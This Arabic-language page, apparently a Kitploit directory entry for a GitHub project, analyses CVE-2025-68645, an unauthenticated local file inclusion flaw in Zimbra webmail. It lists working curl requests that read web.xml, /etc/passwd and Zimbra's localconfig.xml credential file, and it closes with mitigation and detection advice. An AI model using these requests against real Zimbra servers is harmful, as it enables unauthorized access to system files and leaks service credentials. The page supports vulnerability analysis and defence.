Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68645 — CVE-2025-68645 | Kitploit
أدوات/GitHubGitHub/0xblackash/cve-2025-68645
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHub0xblackash/cve-2025-68645

CVE-2025-68645

CVE-2025-68645

عرض المستودع
21منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ CVE-2025-68645 - تحليل تضمين الملفات المحلية (LFI) في Zimbra

zimbra

Vulnerability Target Severity Status


📌 نظرة عامة

يصف هذا المستند ثغرة تضمين الملفات المحلية (LFI) التي تؤثر على Zimbra Collaboration Suite.

تنشأ المشكلة بسبب معالجة غير صحيحة للمعامل التالي:

root@kitploit:~
/h/*?javax.servlet.include.servlet_path=

يسمح ذلك لمستخدم غير مصادق بالوصول إلى موارد التطبيق الداخلية.


🔍 تفاصيل الثغرة

  • النوع: تضمين الملفات المحلية (LFI)
  • الوصول: غير مصادق
  • المكون المتأثر: Webmail (الواجهة الكلاسيكية)
  • ناقل الهجوم: التلاعب بطلبات HTTP

🧪 التحقق الأولي

طلب الاختبار:

root@kitploit:~
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

▶️ العرض التوضيحي:

cve-2025-68645 cve-2025-68645 1

✅ النتيجة

  • تم استرجاع الملف الداخلي بنجاح
  • يؤكد سوء معالجة الإدخال

⚙️ سلوك نقطة النهاية

تتعامل نقاط النهاية المتعددة مع المعامل الضعيف بشكل مختلف.

مثال:

root@kitploit:~
/h/printcalendar?javax.servlet.include.servlet_path=...

ملاحظات:

  • سلوك وصول أكثر اتساقًا للملفات
  • موثوقية استجابة أفضل مقارنة بـ /h/rest

🚧 اعتبارات TLS

المشكلة

root@kitploit:~
SSL: certificate subject name does not match target host

الحل البديل

root@kitploit:~
curl -k "https://TARGET/..."

🚀 أمثلة الاستغلال

📂 الوصول إلى مورد ويب داخلي

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

📂 محاولة الوصول إلى ملف النظام

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"

🔐 الوصول إلى إعدادات التطبيق

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"

التعرض المحتمل:

  • بيانات اعتماد الخدمة
  • الإعدادات الداخلية
  • تفاصيل البنية التحتية

🧠 التأثير

قد يؤدي الاستغلال الناجح إلى:

  • الكشف عن ملفات الإعدادات الحساسة
  • كشف الخدمات والبنية الداخلية
  • تسرب بيانات الاعتماد
  • زيادة خطر الاختراق الإضافي

🛡️ التخفيف

  • تحديث Zimbra إلى الإصدارات المصححة
  • تقييد الوصول إلى نقاط النهاية الضعيفة
  • مراقبة السجلات بحثًا عن معاملات مشبوهة:
    • javax.servlet.include.servlet_path
  • نشر قواعد جدار حماية تطبيقات الويب (WAF) لمنع الأنماط الخبيثة

💡 الوجبات الرئيسية

  • يمكن أن تؤدي فشل التحقق من الإدخال إلى كشف الموارد الداخلية
  • قد تتصرف نقاط النهاية المختلفة بشكل غير متسق
  • غالبًا ما تحتوي ملفات الإعدادات على معلومات حساسة
  • الكشف المبكر يقلل المخاطر بشكل كبير

🏴 الخلاصة

  • الثغرة مؤكدة: CVE-2025-68645
  • الاستغلال يسمح بالوصول غير المصرح به للملفات
  • يوصى بشدة بالمعالجة الفورية

🔐 الأمان مهم

تنزيل الأداة